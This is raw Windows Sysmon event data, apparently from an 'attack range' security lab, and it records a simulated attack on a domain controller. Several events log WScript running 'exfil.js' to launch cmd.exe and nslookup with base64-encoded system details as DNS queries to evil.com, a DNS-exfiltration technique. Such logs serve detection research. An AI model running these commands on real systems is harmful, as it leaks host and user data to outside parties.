10341000x8000000000000000201475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.301{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.301{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.301{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E040-000000005F02}6672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.301{2E1864BB-17A1-629A-783D-000000005F02}55527616C:\Windows\System32\WScript.exe{2E1864BB-17C3-629A-E040-000000005F02}6672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.311{2E1864BB-17C3-629A-E040-000000005F02}6672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwtz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.301{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnqpfw.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.254{2E1864BB-17C3-629A-DE40-000000005F02}72887008C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-DF40-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.254{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.254{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.254{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.254{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.254{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-DF40-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.254{2E1864BB-17C3-629A-DD40-000000005F02}5724684C:\Windows\system32\cmd.exe{2E1864BB-17C3-629A-DF40-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.259{2E1864BB-17C3-629A-DF40-000000005F02}2256C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C3-629A-DD40-000000005F02}5724C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnqpfw.tmp 2>&1 10341000x8000000000000000201461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.223{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-DE40-000000005F02}7288C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.223{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-DE40-000000005F02}7288C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.218{2E1864BB-17C3-629A-DE40-000000005F02}72887008C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-DD40-000000005F02}5724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.185{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-DE40-000000005F02}7288C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.170{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.170{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.170{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.170{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.170{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-DD40-000000005F02}5724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.170{2E1864BB-17A1-629A-783D-000000005F02}55527944C:\Windows\System32\WScript.exe{2E1864BB-17C3-629A-DD40-000000005F02}5724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.175{2E1864BB-17C3-629A-DD40-000000005F02}5724C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnqpfw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.170{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljocc.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.101{2E1864BB-17C3-629A-DB40-000000005F02}43365472C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-DC40-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.085{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.085{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.085{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 